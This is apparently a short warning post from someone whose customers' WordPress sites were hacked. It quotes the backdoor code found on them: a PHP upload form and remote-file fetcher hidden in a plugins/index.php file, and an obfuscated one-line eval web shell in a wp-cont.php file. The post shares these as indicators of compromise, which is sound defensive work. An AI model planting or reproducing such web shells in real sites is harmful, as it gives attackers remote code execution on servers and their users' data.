I guess these Hackers look after sometihing like
if(isset($_GET[php4])) {echo '<form action="" method="post" enctype="multipart/form-data" name="silence" id="silence">'; echo '<input type="file" name="file"><input name="golden" type="submit" id="golden" value="Done"></form>';
if( $_POST['golden'] == "Done" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '+'; } else { echo '-'; }}} if(isset($_GET[php5])) {$file=$_GET["php5"]; $wpf=strrchr($file, '/'); $wpf=str_replace("/","",$wpf); $content=file_get_contents($file); $wpt = fopen($wpf, "w"); fwrite($wpt, $content); fclose($wpt); } else {echo '<title></title>';}
in your files. At least that was written in a plugins/index.php-File of one of our hacked customer-sites. Along with a wp-cont.php-File in the same directory with
<script language='php'> $a=chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101); eval($a($_REQUEST[sam]));
and some other nasty things. What we think: With the help of this hacked files, “abdullkarem” uploaded some other files to the system, did what he wanted to do and deleted them again.
So watch out for any “golden”-Posts and “sam”-Requests.
